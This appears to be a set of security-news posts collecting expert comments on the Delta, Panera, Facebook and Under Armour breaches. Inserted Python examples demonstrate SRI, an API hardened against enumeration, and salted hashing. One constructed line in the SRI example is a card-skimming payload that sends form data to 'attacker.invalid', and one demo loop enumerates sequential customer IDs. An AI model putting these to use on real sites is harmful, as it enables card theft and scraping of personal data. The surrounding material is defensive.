The breach occurred last year and remained undetected until a week ago. Customers should always be attentive to their card transactions. Depending on the maturity of security delivered by issuing banks, it is for example possible to block cards for card-not-present transactions without further authorization from the cardholder – however this does not hold true for all banks or geographical regions. As a customer, demand either to be protected from damage, or to be provided adequate technical protection by your card issuer.

Do you have any comments around the payment platform that exposed the details?

Delta, like any other organization hosting web content, must consider that in any instance where logic flows from one application to another there is a transfer of trust – trust you have with your clients which is based on your brand and your relationship with your customers. This breach had its primary incident not with Delta but with their partner – yet it is stated as an issue affecting Delta. This is the reason it matters to understand your entire digital ecosystem: everything ranging from outsourced processes to “cross domain” included scripts, including ad-networks, allows someone else to interact with your customers based on the trust those customers invest in you. And that also means a good part of the negative impact of a breach with a partner will reflect back on that trust.

One should also note that this is a certified organization which has been through reviews and testing – security is a continuous process, and compliance is not a guarantee of security. As long as banks hold their clients damage free, we can accept the current level of security. If consumers are to shoulder the costs or responsibility, much is still to be done regarding rather basic security in the payment card industry.
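The “cross domain” included scripts mentioned above are the one place where a site owner can pin trust to specific script content rather than to a partner’s domain. As an added example (not part of the commentary, and not code from Delta, its chat provider or any vendor), the Python below computes a Subresource Integrity (SRI) value for a reviewed third-party script and checks a fetched copy against it, which is the check a browser performs before it executes a script tag carrying an integrity attribute. The chat widget bytes, the tampered copy and the vendor URL are constructed for the demo.

```python
import base64
import hashlib
import hmac

SRI_ALGOS = ("sha256", "sha384", "sha512")   # the digests browsers accept for SRI


def sri_integrity(script: bytes, algo: str = "sha384") -> str:
    """Build the value for <script integrity="..."> from the reviewed script bytes."""
    if algo not in SRI_ALGOS:
        raise ValueError(f"unsupported SRI digest: {algo}")
    digest = hashlib.new(algo, script).digest()
    return f"{algo}-{base64.b64encode(digest).decode('ascii')}"


def sri_verify(fetched: bytes, integrity: str) -> bool:
    """Accept the fetched script only if it matches one of the pinned digests.

    The attribute may list several space-separated values; the browser runs
    the script if any of them matches the body it actually received.
    """
    for token in integrity.split():
        algo, _, expected = token.partition("-")
        if algo not in SRI_ALGOS or not expected:
            continue                         # malformed or unknown entry: never trust it
        actual = base64.b64encode(hashlib.new(algo, fetched).digest()).decode("ascii")
        if hmac.compare_digest(actual, expected):
            return True
    return False                             # fail closed: mismatch means do not execute


def script_tag(src: str, integrity: str) -> str:
    """Emit the tag; crossorigin is required for SRI on a cross-origin script."""
    return (f'<script src="{src}" integrity="{integrity}" '
            f'crossorigin="anonymous"></script>')


# Constructed sample: the widget a hypothetical chat vendor served when the
# site owner reviewed and pinned it ...
PINNED_WIDGET = b"window.chat = { open: function () { /* vendor UI */ } };\n"
# ... and a later, tampered copy that also reads the payment form.
TAMPERED_WIDGET = PINNED_WIDGET + (
    b"new Image().src = 'https://attacker.invalid/?c=' + document.forms[0].card.value;\n"
)

if __name__ == "__main__":
    pin = sri_integrity(PINNED_WIDGET)
    # hypothetical vendor URL
    print(script_tag("https://chat-vendor.invalid/widget.js", pin))
    print("reviewed copy accepted:", sri_verify(PINNED_WIDGET, pin))    # True
    print("tampered copy accepted:", sri_verify(TAMPERED_WIDGET, pin))  # False
```

Two caveats a practitioner would want: SRI only works when the vendor serves fixed script content, so any change on their side has to be coordinated with you or the widget simply stops loading; and it says nothing about what a trusted script does once it runs, including what it fetches next, which is what a Content Security Policy is for.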

Craig Young, Computer Security Researcher at Tripwire:

“There are some interesting questions to ask in response to this disclosure. Why was the breach window so short? Were the attackers discovered and booted back in October? If so, why is it that we are only learning of the breach nearly six months later? If not, how can [24] be so confident of the scope of the breach? Were payment card providers notified sooner? Time is a critical factor for preventing fraud whenever there is a breach of financial data. Delta has assured customers that they won’t be held responsible for fraudulent charges but it seems likely that if fraudulent charges related to this have not already been identified, there is little hope that they will ever be connected to this breach.”

Lee Munson, Security Researcher at

“The cyberattack experienced by Delta highlights the many different facets of a data breach, from the good to the bad, as well as the unknown.

Obviously the big negative here is the fact that customers have potentially had their payment card data swiped, though the unknown factor is whether or not that information was encrypted, or how.

From an incident response point of view, it is a shame to learn that the attack has only now come to light, having occurred and been spotted last year, though we are, of course, unaware of when affected customers were notified.

On a more positive note, no personal information was stolen and Delta was quick to examine the breach and learn lessons from it.

We can only hope that affected customers have been offered appropriate support and advice and are now changing passwords where appropriate and examining credit reports with a keen eye.”

Satya Gupta, Co-Founder and Chief Technology Officer at Virsec:

“Once again, another breach raises troubling questions about why current security defenses are failing, and why organizations are dragging their feet with public breach notification. The company says it was notified in mid-March, yet the breach occurred six months earlier and was “quickly resolved.” Whether it’s a company or sub-contractor, the first impulse when a breach is discovered seems to be stalling and hoping it will not go public.

More broadly, we continue to rely on an outdated security model – protecting a porous perimeter, while hackers are often already inside, waiting to exploit vulnerabilities that may dwell for months. The focus has to shift to directly protecting applications and critical data – not relying on perimeter protection which is rapidly disappearing.”

Nick Bilogorskiy, Cybersecurity Strategist at Juniper Networks:

“Delta Air was not directly breached, it was affected by a third-party vendor breach. We saw this vector in play earlier this week with the Energy Transfer Partners third-party EDI breach.

It is no longer enough for large companies to only protect their own networks and internal systems from malware. Nowadays, business is conducted with the help of third-party service companies that provide savings by solving a piece of the puzzle for big companies, like online transaction support, for instance. In such cases, the third-party vendor increases the attack surface and the risk of a cybersecurity breach for the enterprise.

Third parties have been the vector of attack in many high-profile breaches and I anticipate this trend will continue. In recent years, 63 percent of breaches were traced to third-party vendors, according to the Soha Systems survey on third-party risk management. If a hacker can breach a company and pretend to be a legitimate vendor, they may have full access to a company’s network for months; plenty of time to monetize their attack.

A vendor often serves multiple customers, which can create complications and delays in incident response. It is crucial for companies to audit the security posture of their vendor just as rigorously as they do their own.

[24] operates global centers that outsource voice and chat agent services for sales and support, providing a channel of communication between their clients and customers. When such a channel is compromised, it can be quite damaging as the attackers can pose as support or sales managers and ask customers to provide sensitive information.”

Anthony James, Chief Marketing Officer at CipherCloud (San Jose, CA):

“It is an all too frequent headline – another high profile company breached with hundreds of thousands of customers’ personal information or credit card data stolen. As with the Sears breach announced today, third-party companies are the weakest link in the security chain. The unfortunate realization that the largest brands are being impacted by their smaller partner companies should inform any organization when they establish their security practices and controls.

The question needs to be asked, who are our partners, what are their security practices, what data are we sharing, and what systems will they have access to?  In this example, [24] – the software service provider for Sears (and many other large retail and airline brands) – became the source for the breach exposing customer credit card data.

With data being the core asset cyber thieves are targeting, new approaches to data protection need to be implemented. There are plenty of new technology approaches to secure data when it is at rest, in flight and in use. These strategies need to be implemented when companies have access to critical customer data.” 

Mounir Hahad, Head of Juniper Threat Labs at Juniper Networks:

“The fact that these two breaches have been discovered in September and March, respectively, means there may be a systemic issue that has been present for at least the past six months within the area of compromise.

It is important to understand that this breach is different from some past breaches, such as Target, where the third-party vendor was a vehicle for an intrusion into the final victim’s own network. In the case of SaaS offerings, a threat actor may not even need to breach your network, siphoning off your data directly from the third-party vendor that you do business with instead. In other words, it is just as important to assess the security posture of a vendor you allow into your network as a vendor you exchange information with to provide you with a service. At the end of the day, it’s companies like Delta Air and Sears that end up in the news, not so much the third-party vendor.”


Facebook Scandal Hit 87 Million Users

The ISBuzz Post: This Post Facebook Scandal Hit 87 Million Users appeared first on Information Security Buzz.

News broke yesterday evening that Facebook now believes that the data of up to 87 million people was improperly shared with Cambridge Analytica – many more than previously disclosed – with around 1.1 million UK-based.

Despite this story being covered by every major media outlet, we are just scratching the surface. Reactions such as “isn’t this total disrespect for our privacy?!” are now painfully visible, and accurate. IT security experts commented below.

Evgeny Chereshnev, CEO at Biolink.Tech:

“It doesn’t matter what this data leakage would have proven or not proven. The point is that there was always the opportunity, and possibility, that certain data would be extracted from Facebook by hackers or third party providers that we, the users, were not aware of. It has been said that it’s data taken from Facebook without the users’ consent. This is both true and not true. If you read the licence agreement, when you sign up to Facebook, you would understand that you have absolutely no rights when it comes to your data; your information, what you post and how information is gathered about you. Facebook can analyse and use this data any way it wants.

I am actually very happy this has happened, as it shows just how severe and significant the problem is. Firstly, if there is a database, it only has two states – already hacked or will be hacked – that is simply the fate of all centralised user databases. We have to embrace blockchain and a diversified, distributed way of dealing with data.

Secondly, we need to totally rethink the way we approach data – our digital trail and DDNA (digital DNA). Privacy of personal data MUST become a constitutional right that everyone has from birth. Data is there forever, and it should be illegal to take it from users. It goes back to the age old question – what is self? Who owns it and what needs to be co-owned by third parties for self to coexist in the society that we live in? For example, a healthcare system needs access to my vital health records in order to administer the right treatment, but they don’t need to own that data. We should own our own self.

In that sense, the EU is the closest to doing the right thing, but there is always room for improvement, even when GDPR comes into effect.”

Craig Young, Computer Security Researcher at Tripwire:

“This is one of those situations that should be an eye opener to people on the importance of reading before clicking OK. Unfortunately, data privacy is a lot like oral hygiene, everyone knows they should pay attention to it but in practice people tend to neglect it.

Many Facebook users are naturally upset about this situation, but in the end the moral of the story here is that people need to be more considerate about what data they are sharing and with whom.”

Travis Smith, Principal Security Researcher at Tripwire:

“There are a few areas of Facebook that people should be concerned with when trying to protect their privacy.  I would follow these steps in order, based off of the level of privacy you wish to have.

  1. Limit what you share on Facebook. There is no need to create a check in location at your house, where people can see your exact location, what valuables you have inside the house, and when you’re on vacation in Disneyland for a week.
  2. Make your profile private. I would recommend making anything you post on the social network be limited to the individuals you have accepted as friends.
  3. Limit what applications you give access to. When signing up for a new service, there’s a handy little “Join with Facebook” option many times. This can allow the creator of that website unfettered access to your profile. Similarly, clicking the various personality tests or similar apps gives the author a level of access that you may not even want your own family to have. The author of these games rarely, if ever, needs access to your profile. Be very wary about who you give access to, because once they have access once, the data can be taken and you cannot get it back.
  4. Monitor what applications have access to your profile currently.  Even though the applications already could have harvested everything from your profile, it’s wise to go through and make sure to keep the list clean.
  5. Don’t stop at Facebook. Every other service on the Internet has similar collection mechanisms about your private data. What you search for on Google, what YouTube videos you watch, what you search for and buy from Amazon; all of this is stored and can be used to profile you. Don’t assume that anything you do on the Internet is private, because it isn’t.”


UK Businesses Financially Unprepared For Cyber Attacks

The ISBuzz Post: This Post UK Businesses Financially Unprepared For Cyber Attacks appeared first on Information Security Buzz.

Only a third of British businesses have a financial plan in place in case of a cyber attack, according to a survey by Lloyds Bank. Meanwhile, only half of companies discuss the risk of cyber attacks at board level.

The survey found that, if attacked, over a third of firms would pay a ransom to get their data back, but only a quarter had dedicated cyber insurance. IT security experts commented below.

Bill Evans, Senior Director at One Identity: 

“Recently Lloyd’s Bank released some rather disturbing facts regarding UK business’ willingness and ability to respond to a cyberattack.  Notably, it claims that only 33% have a financial plan in place in case of a cyberattack and only half discuss cyber risk at the board level.

This is a real miss. Security must be a board level discussion. One need only look across any variety of news reporting agencies to understand why. Reasons to make this a board level discussion include GDPR violations with their hefty fines, damage to brand in the court of public opinion, and loss of revenue as customer confidence wanes in the wake of a breach.

As we talk with customers, one of the reasons they oftentimes give for not making security a board level discussion is that it doesn’t drive revenue or margin.  It’s viewed as a “cost of doing business” and not worthy of being discussed in the rarified air of “mahogany row.”  As a response, we like to remind them that there are two types of businesses; those that have been breached and those that are about to be.  Then we follow on with, “if you think security is expensive, try being unsecure.”

Javvad Malik, Security Advocate at AlienVault:

“When it comes to cyber attacks, calculating the potential financial impact is something that needs to be undertaken well in advance. Companies should implement threat detection controls based on critical assets and data. This will ensure that any attack is spotted in a timely manner.

The second aspect is the response that should be taken once an incident occurs. Again, the response steps should be planned in advance and based on the criticality of assets and data. For example, if an asset that contained personal information is compromised, the response plan would include notifying the relevant regulatory body. But if a test environment was attacked, the response could be as simple as re-imaging the servers.

By having a plan in advance based on business and information criticality, the cost of security controls can be managed, as well as response plans.”

Dr Anton Grashion, Managing Director, Security Practice at Cylance:

“This is a recurring theme in surveys of businesses. Cybersecurity insurance is just one of the measures organisations can deploy to deal with risk and is often associated with the irreducible amount of risk that is resistant to the other strategies of mitigation, sharing, and avoidance. Because a disproportionate share of the cost of a breach is concentrated in the business implications rather than in all the technical/OPEX heavy responses to a breach, it seems to make perfect sense that a great deal of effort should be concentrated on a prevention strategy first and foremost. While this has proved problematical in the past utilising legacy security tools, new AI and ML technologies can be deployed to stop the first domino from falling and thus proving the adage that an ounce of prevention is worth a pound of cure.”


The Panera Bread Website Breach

The ISBuzz Post: This Post The Panera Bread Website Breach appeared first on Information Security Buzz.

Panera Bread’s website leaked customer information including names, addresses, birthdays, and the last four digits of credit cards for almost eight months before being discovered. IT security experts commented below.

Chris Olson, CEO at The Media Trust:

“Website breaches have become an epidemic that hurts corporate reputation and brand identity. The Panera website leak is just another example that demonstrates the complexity of security in the digital age. Be it poorly configured databases or unmanaged vendors, enterprises have a responsibility to do a better job controlling their digital ecosystems, especially when it comes to protecting consumer data. The ensuing damage to a brand’s image is costly. In today’s changing regulatory environments, enterprises need to update their vendor risk management strategies to include the digital environment, with specific attention paid to identifying all parties executing in websites and mobile apps. For most enterprises, this knowledge is limited to the software and hardware they purchase or license for use. Identification and control of these external resources is critical to developing a comprehensive security strategy for digital assets.”

Mounir Hahad, Head of Juniper Threat Labs at Juniper Networks:

“This kind of programming mistake is much more common than you would think. We highly advise website owners to perform penetration testing of their websites to identify these types of vulnerabilities as early as possible.

In this case, the site had an open API that anyone on the internet could query and did not require any type of authentication. This API discloses the following information about customers who have previously registered on the website: username, first and last name, email address, phone number, birthday, last four digits of the credit card number, home address, social account, user preferences and dietary restrictions. This information can be queried if you know the phone number of the customer, which one could easily obtain using a second API.

This second API can be queried using a customer ID number to retrieve the username chosen, email address, first and last name, loyalty card number, phone number, full birth date and other options like SMS preferences, corporate customer status, etc. This API was easier to mine because sequential numbers were used as customer IDs.”
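The two endpoints described above are the classic insecure direct object reference: no authentication, and records keyed by a phone number or a sequential integer that an attacker can simply iterate. As an added example (not the commentary’s code and not Panera’s), the Python below models both endpoints in their vulnerable form, runs the attacker’s enumeration loop against them, and then shows the hardened shape: a session check, an ownership check, and opaque random public IDs in place of sequential ones. The customer records, endpoint names and the bearer-token session scheme are constructed for the demo.

```python
import secrets
from typing import Optional

# Constructed sample customer records for the demo (not real data).
CUSTOMERS = {
    1001: {"name": "A. Example", "phone": "+1-555-0100", "card_last4": "4242"},
    1002: {"name": "B. Example", "phone": "+1-555-0101", "card_last4": "1881"},
    1003: {"name": "C. Example", "phone": "+1-555-0102", "card_last4": "0005"},
}

# ---------- Vulnerable shape: no authentication, guessable keys ----------

def vulnerable_by_phone(phone: str) -> Optional[dict]:
    """Unauthenticated lookup keyed by a value the attacker may already know."""
    for cid, rec in CUSTOMERS.items():
        if rec["phone"] == phone:
            return {"id": cid, **rec}
    return None


def vulnerable_by_id(customer_id: int) -> Optional[dict]:
    """Unauthenticated lookup keyed by a sequential integer id."""
    return CUSTOMERS.get(customer_id)


def attacker_enumerate(start: int, count: int) -> list:
    """What an attacker does against the vulnerable endpoint: walk the id space."""
    hits = []
    for cid in range(start, start + count):
        if vulnerable_by_id(cid) is not None:
            hits.append(cid)
    return hits


# ---------- Hardened shape: session + ownership check + opaque ids ----------

SESSIONS: dict = {}     # bearer token -> internal customer id (hypothetical scheme)
PUBLIC_IDS: dict = {}   # opaque public id -> internal customer id


def register_public_ids() -> None:
    """Give every record a random public identifier; nothing to count up from."""
    PUBLIC_IDS.clear()
    for cid in CUSTOMERS:
        PUBLIC_IDS[secrets.token_urlsafe(16)] = cid


def login(customer_id: int) -> str:
    """Issue a bearer token (stands in for a real session; expiry omitted)."""
    token = secrets.token_urlsafe(32)
    SESSIONS[token] = customer_id
    return token


def public_id_of(customer_id: int) -> str:
    return next(pid for pid, cid in PUBLIC_IDS.items() if cid == customer_id)


def hardened_profile(token: Optional[str], public_id: str) -> tuple:
    """Return (http_status, body); every check fails closed."""
    caller = SESSIONS.get(token or "")
    if caller is None:
        return 401, None                  # no valid session: nothing is returned
    target = PUBLIC_IDS.get(public_id)
    if target is None:
        return 404, None                  # unknown id
    if target != caller:
        return 403, None                  # authenticated, but not the record's owner
    return 200, CUSTOMERS[target]


if __name__ == "__main__":
    print("vulnerable, walking ids:", attacker_enumerate(1000, 10))   # [1001, 1002, 1003]
    register_public_ids()
    tok = login(1001)
    print("own record:", hardened_profile(tok, public_id_of(1001))[0])      # 200
    print("someone else's:", hardened_profile(tok, public_id_of(1002))[0])  # 403
    print("no session:", hardened_profile(None, public_id_of(1001))[0])     # 401
```

Opaque IDs on their own are not the fix; the ownership check is, and the random IDs only remove the cheap enumeration. Many APIs also return 404 rather than 403 for a record the caller does not own, so that a valid id cannot be confirmed by probing; the two are kept distinct here only for readability.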

Paul Bischoff, privacy advocate at

“The leak is an inexcusable oversight that not only took far too long to fix, but should have never occurred in the first place. Customers’ names, email addresses, physical addresses, birthdays, and the last four digits of their credit cards were accessible for eight months. This was not a sophisticated breach by hackers. The unsecured database of millions of customers could easily be accessed via a web browser, and all the data was available in plain text, meaning thieves wouldn’t even have to bother decrypting it.

This is a good example of why consumers need to be cautious about signing up for loyalty programs and similar promotional membership schemes. It’s very difficult or impossible to know whether a company takes your information security seriously and can competently handle it.”


US Gas Pipelines Hit By Cyberattacks

The ISBuzz Post: This Post US Gas Pipelines Hit By Cyberattacks appeared first on Information Security Buzz.

News broke that a supply chain cyberattack has disrupted a chain of natural gas companies. It affected a software platform, developed by a company named Energy Services Group LLC, that is used to process customer transactions, according to Bloomberg News. Such data-exchange software is widely used in the gas industry, though the attack was limited to the Energy Services platform.

The attack on the billing platform impacted Texas-based Energy Transfer Partners LP, which owns more than 71,000 miles of pipelines containing natural gas, crude oil and other commodities. The Texas firm’s subsidiaries include the Panhandle Eastern Pipe Line Co., whose pipelines run from the Gulf Coast to the Midwest.  IT security experts commented below.

Andrea Carcano, Co-Founder and Chief Product Officer at Nozomi Networks:

“The supply chain cyberattack that disrupted a chain of natural gas companies serves as yet another reminder that oil and gas organizations are high-risk targets. Attacks against them are growing, as evidenced by the recent Ponemon study that shows that sixty-eight percent of oil and gas organizations have experienced at least one cyber compromise. In this case, operations were not ultimately impacted and it’s not immediately clear that they were the target – however, we know that attackers often use IT networks and third-party resources to gain entry to OT networks. That’s why organizations must ensure that IT and OT security efforts are effectively aligned to achieve the best possible protection.”

Bob Noel, Director of Strategic Relationships and Marketing at Plixer:

“Critical infrastructure facilities should be on high alert that they are directly in the cross-hairs of bad actors and nation states. Legacy security approaches that have only focused on the perimeter have failed. It is imperative that these perimeter strategies be complemented with technologies like network traffic analysis (NTA) to scrutinize internal communications to strengthen their security posture. NTA collects data about every conversation on the network, runs advanced security algorithms to look for malicious activity in real-time, and provides historical forensic data to quickly identify the root cause in the event of a breach. Breaches are inevitable, so organizations must turn their focus to monitoring internal traffic and its behavior to protect themselves and the people who rely on their services.”

Tim Erlin, VP at Tripwire:

“Any doubt that critical energy infrastructure in the US is a target for cyber-attackers should be erased at this point. We’ve seen an increasing number of attacks, and increasingly successful attacks, across energy infrastructure.

Panic isn’t the answer to securing our critical infrastructure. Preparation and risk management are key.”


Panera Bread Website Leaks

The ISBuzz Post: This Post Panera Bread Website Leaks appeared first on Information Security Buzz.

It has been discovered that Panera Bread left the information of up to 37 million customers who signed up for delivery and other services, including “names, email and physical addresses, birthdays and the last four digits of the customer’s credit card number”, in plain text format accessible via its web site. IT security experts commented below.

Tim Erlin, VP, Product Management and Strategy at Tripwire:

“Security is often as much about response as prevention, and that includes how organizations respond to incidents and breaches. The market isn’t particularly forgiving when it comes to public incident response.

Organizations that collect, store and transmit customer data need to have plans in place to deal with reported vulnerabilities. The time to plan is before an incident occurs, not during.

Every publicly disclosed incident is an opportunity for unaffected organizations to consider how they would respond. Don’t just criticize the response; use the incident as a model for how your own organization might respond, and take steps to improve before it’s your name in the headline.”

Anthony James, Chief Marketing Officer at CipherCloud:

“Millions of Panera Bread customer records potentially leaked, and most amazing, this went on for at least eight months according to KrebsOnSecurity. This breach is not unusual, and mirrors many recent headlines where mis-configurations occur, procedures may be missed, default passwords may still get used, ports will remain open to the internet, and, in this case, serious issues will somehow not be tracked and resolved. On a larger scale, can you even imagine that the thousands of alerts pouring into the average security operations center on their SIEM display are properly vetted every day? The moral of the story? Mistakes will be made and eventually they will become disastrous unless they are corrected or the data is protected along its entire lifecycle. What can others do to ensure they don’t become tomorrow’s headline? Add the necessary security layers to build Zero Trust into the systems automatically – meaning whatever data is being stored/used, expect it will be compromised. Anticipate that people will make mistakes and build out your cyber defense and your security policies to protect from a breach – your overall security will be stronger for it.”

Lisa Baergen, Director at NuData Security:

“The company names change but the stories remain the same:  Customers have had their information leaked because of the poor security procedures of companies transacting online, who continue to rely solely on plain text identifiers and static data such as credit card numbers, passwords and even simple customer names and phone numbers.

“The most proven and effective solutions for protecting customers are readily available and increasingly widely implemented: multi-layered security solutions that incorporate verification via passive biometrics, without adding friction, by evaluating a consumer’s inherent behaviour online during the transaction process. This field-proven approach lets the company confirm that a consumer is legitimate or a would-be fraudster before loss to the company can occur, even if the correct data – perhaps stolen – was used. And it also prevents the company’s reliance on the sort of personally identifiable customer data that’s once again been leaked. Ultimately, the shift to more advanced multi-layered solutions will, over time, render stolen information valueless to cybercriminals, as passive biometric verification defies use by third parties.”

Travis Smith, Principal Security Researcher at Tripwire:

“A company can spend millions on the latest and greatest security technologies and have the most impenetrable defenses known to man. But when you leave the front door open, none of that will matter.

“Unfortunately, the general public has breach fatigue. It seems like every day there’s another story about a different hack and a different breach of privacy. The reality is that most people will be outraged about this today, but next week they won’t even remember that it happened. Even if there was some sort of litigation, those who were affected can really only count on adding another year of free credit monitoring.

“While this is personally identifiable information, the sad fact is that the only real new piece of information attackers have now is that you like sandwiches. They can correlate that with your healthcare records, credit score, and social media profile to get a more accurate picture of who the real you is.”

Terry Ray, CTO at Imperva:

“It’s never a good day for companies when there is a proven data breach or data made available long-term, as the Federal Trade Commission can easily get involved and ask simple questions to which you don’t have complete answers.

“Was personal and credit card data exposed to the internet? Was any of it taken? How much data was stolen? Where did it go?  When was it taken?

“Law enforcement will need to find proof that data was stolen before levying fines or requiring identity theft protection for consumers, but past situations have shown that the FTC doesn’t have to find every record on the web, they just have to find some, then it’s up to the victim company to prove how many records were taken.  Also, I expect PCI regulators will question any PCI audits done since August looking for passes on application security, code review and code correction.

“Panera appears to have had an application security practice in place, so any investigation will likely spend time understanding what Panera monitored of normal versus abnormal activity, did they have a regularly scheduled security assessment run against their public websites, and did they correct poor coding practices once found.

“It seems at a minimum, they failed to either believe and test the first finding of this breach in August and quickly rectified the issue once it went public here in April. They certainly appear capable of fixing the issue as they did quickly today, so why didn’t it happen in August when they were first alerted?”

Willy Leichter, Vice President of Marketing at Virsec:

“As Yogi Berra said, “this feels like déjà vu all over again.” Once again we see a large organization not taking security seriously enough, not reacting immediately when notified of a possible leak, and not promptly notifying customers that their data was exposed. Ongoing events like this will only heighten calls for a national standard on breach notification laws.”

The ISBuzz Post: This Post Panera Bread Website Leaks appeared first on Information Security Buzz.

Dark Web Price Index For Hacked Accounts

Cybersecurity experts with STEALTHbits, VASCO Data Security and NuData Security commented below on the recent Dark Web Market Price Index published by VPN ratings service’s consumer site “Privacy Central.” The index puts the price of a full online identity at $1,170, while hacked Uber, Airbnb and Netflix accounts go for $10 each, and hacked Grubhub, Walmart and Costco accounts go for between $5 and $10 each.

Ryan Wilk, Vice President of Customer Success at NuData Security: 

“Among all the personally identifiable information available on the web, the most valuable one is your complete online identity, as it includes data to access all your online accounts. It’s not surprising that each account, each type of data, or the whole package are sold online as if they were a pair of sneakers. Fraudsters work hard to get that information, and by reselling it, they are increasing its value, just like any other industry would do.”

“To fight this wave of exposed data, many forward-thinking retailers and other major organizations are adopting a multi-layered approach to verifying their users online – such as passive biometrics and behavioral analytics. This approach makes online accounts more secure as they can’t be accessed by bad actors, even if they present the right credentials.

Because these technologies don’t rely on static data, they are devaluing it and, ultimately, they can affect the value of stolen data on the dark market.”

“This approach to online verification that uses behavioral data signals to verify a user is allowing companies to avoid account takeover with stolen credentials and focus on their good customers.”

“This report is a good reminder of the importance of having multi-layered security and also underscores that fraudsters are highly evolved and sophisticated criminal enterprises.”

David Vergara, Director – Security Product Marketing at VASCO Data Security:

“The key take-away from this report is that cybercriminals understand the business of monetizing stolen data along with the related level of effort and ROI. The level of sophistication is increasing rapidly. Phishing emails were once riddled with spelling errors and pop-ups that easily flagged them as unprofessional and suspicious; this is no longer the case as even security-aware individuals are falling prey to more “polished” schemes. Also, the volume of breached data, and number of individuals affected, means individuals should assume their personal information is exposed and proactively check credit reports and, for the strongest defensive measure, freeze credit with all the major credit bureaus. Lastly, consumers should take advantage of multi-factor authentication security when available and businesses should prioritize efforts to deploy this strong security.”

Jonathan Sander, CTO at STEALTHbits Technologies:

“People are often scared of bad guys getting their credit card numbers. The truth is that a small bit of awareness can protect you from nearly any credit card fraud. Most of the risk is actually on your credit card provider – as long as you monitor your bills and raise your hand when there is suspicious activity. If you use one of the higher end cards, they will do that for you. And you can also hook your credit cards up to services like Apple, Google, or Samsung payments and get alerts for each charge to ensure you see something off color right away.

“The bigger risk in these data black markets is the deadly combination of leaked passwords and lazy users. If someone gets your email password from a black market and you have never changed it, then they can use that “forgot your password” link on the credit card website to take over your account without ever paying a dime for your credit card number. Same for your bank account, Netflix, and just about everything else you use online that’s linked to your email. The bad guys who are really dangerous know that. Luckily, bad guys are about as lazy as the average person – because they are just people, too.”

150 Million Affected By Under Armour Data Breach

In response to the news that fitness brand Under Armour has suffered a massive data breach affecting 150 million users, IT security experts commented below.

Terry Ray, CTO at Imperva:

“Most consumers are becoming a bit desensitized to data breaches, which have become common enough to barely make the news.  And if one breach makes news, there are ten that don’t.  In this case, it’s good that Under Armour detected the breach at all.  Many companies fail this first most important step.  Secondly, they at least used bcrypt for the passwords which is considerably more compute intensive than sha-1.  Unfortunately, using only sha-1 for usernames and email addresses is a problem.  For one, there are billions of already decrypted sha-1 hashes freely available on the web and cracking a new one doesn’t take too much effort.  This is why Under Armour took the appropriate steps to instruct users to change their passwords both on their site as well as any other site that uses those same usernames or email addresses.

I couldn’t agree more with the need for these users to change their passwords to something difficult to crack.  There are plenty of resources online that will help you create an effective password.   Anytime a leak of usernames or email addresses is made available, the anti-fraud technologies monitoring for fraudulent and failed logins see major activity spikes with large numbers of login attempts using known passwords and large password dictionaries.”
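The point above about SHA-1-hashed usernames and e-mail addresses being cheap to recover, next to bcrypt for passwords, is easy to make concrete. The following is an added example (not Imperva's or Under Armour's code): a defender's breach-impact check that shows how an unsalted fast hash of a low-entropy identifier is matched by a precomputed table, and how a per-record salt plus a slow KDF defeats that table. All data is constructed, and PBKDF2-HMAC-SHA256 from the standard library stands in for bcrypt (an assumption; the salt-and-cost argument is the same).

```python
import hashlib
import hmac
import os

# Constructed sample data (not from the breach): the customer identifiers a
# company holds. The "leaked" hashes are built from them further down.
CUSTOMER_EMAILS = [
    "alice@example.com",
    "bob@example.org",
    "carol@example.net",
]


def sha1_hex(value: str) -> str:
    """Unsalted SHA-1 of an identifier, the scheme criticised in the comment above."""
    return hashlib.sha1(value.encode("utf-8")).hexdigest()


def build_lookup_table(candidates):
    """digest -> plaintext for every candidate identifier.

    E-mail addresses are low-entropy, so anyone holding an address list can
    build the same table; an unsalted fast hash therefore gives them only
    nominal protection."""
    return {sha1_hex(c): c for c in candidates}


def exposed_customers(leaked_hashes, table):
    """Breach-impact check a defender runs: which of our customers' identifiers
    are effectively plaintext in the leak?"""
    return sorted(table[h] for h in leaked_hashes if h in table)


def slow_salted_hash(value: str, salt: bytes, iterations: int = 100_000) -> str:
    """Per-record random salt plus a deliberately slow KDF.

    PBKDF2-HMAC-SHA256 is a stdlib stand-in for bcrypt (assumption: bcrypt is
    not installed). Stored form: salt$iterations$derived_key, all hex."""
    dk = hashlib.pbkdf2_hmac("sha256", value.encode("utf-8"), salt, iterations)
    return f"{salt.hex()}${iterations}${dk.hex()}"


def verify_salted(value: str, stored: str) -> bool:
    """Recompute with the stored salt and compare in constant time."""
    salt_hex, iters, _ = stored.split("$", 2)
    candidate = slow_salted_hash(value, bytes.fromhex(salt_hex), int(iters))
    return hmac.compare_digest(candidate, stored)


def demo():
    table = build_lookup_table(CUSTOMER_EMAILS)
    # Constructed "leak": two of our customers plus one unknown address.
    leaked = [sha1_hex(e) for e in CUSTOMER_EMAILS[:2]] + [sha1_hex("stranger@example.test")]
    exposed = exposed_customers(leaked, table)  # -> ['alice@example.com', 'bob@example.org']

    # Same identifier, two random salts: the digests differ, so there is no
    # shared lookup table, no cross-record correlation, and every guess costs
    # a full KDF run instead of one SHA-1 call.
    h1 = slow_salted_hash("alice@example.com", os.urandom(16))
    h2 = slow_salted_hash("alice@example.com", os.urandom(16))
    return exposed, h1 != h2, verify_salted("alice@example.com", h1)


if __name__ == "__main__":
    print(demo())
```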

Evgeny Chereshnev, CEO and Founder at Biolink.Tech:

“150 million hacked accounts is hugely significant, especially because most users use the same pairs of logins and passwords across multiple sites. Hackers will break the weakest point; in this case a fitness tracker database, and they can use this information to access users’ emails, social networks and more.

When users are notified about changing passwords following a breach, more often than not they do so in a predictable way such as adding a 1 or a ! at the end, but these algorithms are known by hackers. They use machine learning and AI too – it’s not like that’s only available to the good guys, right?

Hackers can also match these stolen email addresses and passwords to other known databases of stolen credit card numbers, social security numbers, behavioural data bought from brokers etc. With this aggregated data, hackers can build up a pretty detailed profile of a user.

If these hackers were able to match these stolen login credentials to the users’ actual fitness data, just imagine what could happen. Having this level of data would allow hackers to know that Mr Smith has a very specific and predictable pattern of behaviour. Fitness trackers don’t only track calories and the number of steps a person walks in a day; they also know where people are and at what time. For hackers wanting to specifically target a certain person, this data is a gold mine.”

Lisa Baergen, APR, MCC, Marketing Director at NuData Security:

“The re-use of passwords in situations like this may seem like a short lapse in judgment, but this data that aligns names and email addresses with passwords is a potential disaster for anyone who reuses their passwords across multiple sites and accounts.

